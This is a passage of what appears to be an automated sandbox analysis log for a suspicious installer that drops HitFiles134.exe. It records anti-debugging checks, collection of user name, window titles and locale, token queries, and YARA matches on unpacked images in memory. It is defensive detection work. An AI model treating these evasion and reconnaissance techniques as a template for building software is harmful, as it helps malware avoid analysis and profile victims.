Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_shfoldr.dll |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\is-S7F6P.tmp |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Program Files (x86)\Split Files\unins000.exe (copy) |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\is-CE3AQ.tmp\_isetup\_setup64.tmp |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: __Init_thread_footer,GetUserNameA,GetUserNameA,__Init_thread_footer,GetUserNameA,__Init_thread_footer,GetUserNameA,GetForegroundWindow,GetWindowTextA,Sleep,Sleep,GetForegroundWindow,GetWindowTextA, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00404490 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer,__Init_thread_footer, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00423E2D FindFirstFileExW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_1000959D FindFirstFileExW, |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\Temp\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\Local\ |
Source: C:\Users\user\Desktop\file.exe | File opened: C:\Users\user~1\AppData\ |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0042041F mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_00417BAF mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_100091C7 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_10006CE1 mov eax, dword ptr fs:[00000030h] |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040F789 SetUnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0041336B IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040F5F5 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_0040EBD2 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_10006180 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_100035DF SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: 2_2_10003AD4 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: 1_2_0042DF24 AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid, |
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: Program Manager |
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: program manager |
Source: HitFiles134.exe, 00000002.00000002.332310756.00000000034CF000.00000004.00000010.00020000.00000000.sdmp | Binary or memory string: F.program manager |
Source: C:\Users\user\Desktop\file.exe | Code function: GetLocaleInfoA, |
Source: C:\Users\user\AppData\Local\Temp\is-OVJ5O.tmp\file.tmp | Code function: GetLocaleInfoA, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: EnumSystemLocalesW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW, |
Source: C:\Program Files (x86)\Split Files\HitFiles134.exe | Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW, |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.raw.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.32d0000.3.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 2.2.HitFiles134.exe.400000.1.unpack, type: UNPACKEDPE |
Source: Yara match | File source: 00000002.00000002.332146458.0000000003330000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.330440301.0000000000400000.00000040.00000001.01000000.00000006.sdmp, type: MEMORY |
Source: Yara match | File source: 00000002.00000002.332003406.00000000032D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY |